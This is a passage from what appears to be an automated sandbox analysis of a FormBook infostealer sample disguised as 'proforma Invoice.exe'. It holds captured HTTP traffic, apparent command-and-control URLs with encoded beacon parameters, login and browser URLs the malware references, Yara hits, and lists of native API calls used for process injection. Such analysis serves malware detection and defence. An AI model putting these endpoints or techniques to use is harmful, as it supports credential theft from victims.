request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:12:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:12:23 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:12:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 09:12:28 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:48 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:51 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:53 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 09:12:56 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 78 74 75 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /xtuc/ was not found on this server.</p></body></html>
                Source: EhStorAuthn.exe, 00000006.00000002.4499739121.000000000593E000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://roopiedutech.online/7ozt/?N6gPj2W=psE7W4vuissyAl/ABd0RRSDRsgAd/B1BJj48EisfIdJC69TtqD1fLSmJuMd
                Source: EhStorAuthn.exe, 00000006.00000002.4499739121.0000000005AD0000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003D10000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://seikai.click/c52l/?N6gPj2W=CYuySeqU886kxlWyyNa/wcd36R1F3r0dFV8i/RXeMxM6gRw3d8zll6e6
                Source: kYuxUXtJmKaZ.exe, 00000008.00000002.4500691276.0000000005491000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nutrigenfit.online
                Source: kYuxUXtJmKaZ.exe, 00000008.00000002.4500691276.0000000005491000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nutrigenfit.online/xtuc/
                Source: EhStorAuthn.exe, 00000006.00000002.4499739121.00000000052F6000.00000004.10000000.00040000.00000000.sdmp, kYuxUXtJmKaZ.exe, 00000008.00000002.4498957890.0000000003536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.seraph.best/
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: EhStorAuthn.exe, 00000006.00000002.4497404276.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: EhStorAuthn.exe, 00000006.00000003.2660368282.0000000007AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: EhStorAuthn.exe, 00000006.00000002.4501645745.0000000007B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.proforma Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2475809214.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4500691276.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499075005.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4497065803.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4499024657.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2475264775.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2476745672.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4498872401.00000000033C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: proforma Invoice.exe
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0042C653 NtClose,3_2_0042C653
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2B60 NtClose,LdrInitializeThunk,3_2_011A2B60
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_011A2DF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_011A2C70
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A35C0 NtCreateMutant,LdrInitializeThunk,3_2_011A35C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A4340 NtSetContextThread,3_2_011A4340
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A4650 NtSuspendThread,3_2_011A4650
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2B80 NtQueryInformationFile,3_2_011A2B80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2BA0 NtEnumerateValueKey,3_2_011A2BA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2BF0 NtAllocateVirtualMemory,3_2_011A2BF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2BE0 NtQueryValueKey,3_2_011A2BE0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2AB0 NtWaitForSingleObject,3_2_011A2AB0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2AD0 NtReadFile,3_2_011A2AD0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2AF0 NtWriteFile,3_2_011A2AF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2D10 NtMapViewOfSection,3_2_011A2D10
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2D00 NtSetInformationFile,3_2_011A2D00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2D30 NtUnmapViewOfSection,3_2_011A2D30
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2DB0 NtEnumerateKey,3_2_011A2DB0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2DD0 NtDelayExecution,3_2_011A2DD0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2C00 NtQueryInformationProcess,3_2_011A2C00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2C60 NtCreateKey,3_2_011A2C60
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2CA0 NtQueryInformationToken,3_2_011A2CA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2CC0 NtQueryVirtualMemory,3_2_011A2CC0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2CF0 NtOpenProcess,3_2_011A2CF0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2F30 NtCreateSection,3_2_011A2F30
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2F60 NtCreateProcessEx,3_2_011A2F60
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2F90 NtProtectVirtualMemory,3_2_011A2F90
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2FB0 NtResumeThread,3_2_011A2FB0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2FA0 NtQuerySection,3_2_011A2FA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2FE0 NtCreateFile,3_2_011A2FE0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2E30 NtWriteVirtualMemory,3_2_011A2E30
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2E80 NtReadVirtualMemory,3_2_011A2E80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2EA0 NtAdjustPrivilegesToken,3_2_011A2EA0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A2EE0 NtQueueApcThread,3_2_011A2EE0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A3010 NtOpenDirectoryObject,3_2_011A3010
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011A3090 NtSetValueKey,3_2_011A3090
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C4650 NtSuspendThread,LdrInitializeThunk,6_2_047C4650
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C4340 NtSetContextThread,LdrInitializeThunk,6_2_047C4340
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047C2C70
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2C60 NtCreateKey,LdrInitializeThunk,6_2_047C2C60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047C2CA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047C2D30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047C2D10
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047C2DF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047C2DD0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047C2EE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047C2E80
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2F30 NtCreateSection,LdrInitializeThunk,6_2_047C2F30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2FE0 NtCreateFile,LdrInitializeThunk,6_2_047C2FE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2FB0 NtResumeThread,LdrInitializeThunk,6_2_047C2FB0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2AF0 NtWriteFile,LdrInitializeThunk,6_2_047C2AF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2AD0 NtReadFile,LdrInitializeThunk,6_2_047C2AD0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2B60 NtClose,LdrInitializeThunk,6_2_047C2B60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047C2BF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047C2BE0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047C2BA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C35C0 NtCreateMutant,LdrInitializeThunk,6_2_047C35C0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C39B0 NtGetContextThread,LdrInitializeThunk,6_2_047C39B0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2C00 NtQueryInformationProcess,6_2_047C2C00
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2CF0 NtOpenProcess,6_2_047C2CF0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2CC0 NtQueryVirtualMemory,6_2_047C2CC0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2D00 NtSetInformationFile,6_2_047C2D00
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2DB0 NtEnumerateKey,6_2_047C2DB0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2E30 NtWriteVirtualMemory,6_2_047C2E30
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2EA0 NtAdjustPrivilegesToken,6_2_047C2EA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2F60 NtCreateProcessEx,6_2_047C2F60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2FA0 NtQuerySection,6_2_047C2FA0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2F90 NtProtectVirtualMemory,6_2_047C2F90
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2AB0 NtWaitForSingleObject,6_2_047C2AB0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C2B80 NtQueryInformationFile,6_2_047C2B80
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3010 NtOpenDirectoryObject,6_2_047C3010
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3090 NtSetValueKey,6_2_047C3090
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3D70 NtOpenThread,6_2_047C3D70
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_047C3D10 NtOpenProcessToken,6_2_047C3D10
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00709060 NtClose,6_2_00709060
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_007091D0 NtAllocateVirtualMemory,6_2_007091D0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00708D60 NtCreateFile,6_2_00708D60
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00708ED0 NtReadFile,6_2_00708ED0
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 6_2_00708FC0 NtDeleteFile,6_2_00708FC0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_0147D63C0_2_0147D63C
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D900400_2_07D90040
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D930380_2_07D93038
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D9FA000_2_07D9FA00
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D9B7600_2_07D9B760
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D9C4580_2_07D9C458
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D924280_2_07D92428
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D932C80_2_07D932C8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D932B70_2_07D932B7
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D9A0B80_2_07D9A0B8
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D9001F0_2_07D9001F
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D930280_2_07D93028
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D99C800_2_07D99C80
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 0_2_07D998480_2_07D99848
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004186533_2_00418653
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004168A33_2_004168A3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004101433_2_00410143
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004011003_2_00401100
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0040E1C33_2_0040E1C3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004029E03_2_004029E0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004033703_2_00403370
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004024C03_2_004024C0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0042ECF33_2_0042ECF3
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004024B53_2_004024B5
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_004026903_2_00402690
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0040FF1D3_2_0040FF1D
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0040FF233_2_0040FF23
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011601003_2_01160100
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0120A1183_2_0120A118
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_011F81583_2_011F8158
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012301AA3_2_012301AA
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012281CC3_2_012281CC
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012020003_2_01202000
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0122A3523_2_0122A352
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012303E63_2_012303E6
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_0117E3F03_2_0117E3F0
                Source: C:\Users\user\Desktop\proforma Invoice.exeCode function: 3_2_012102743_2_01210274
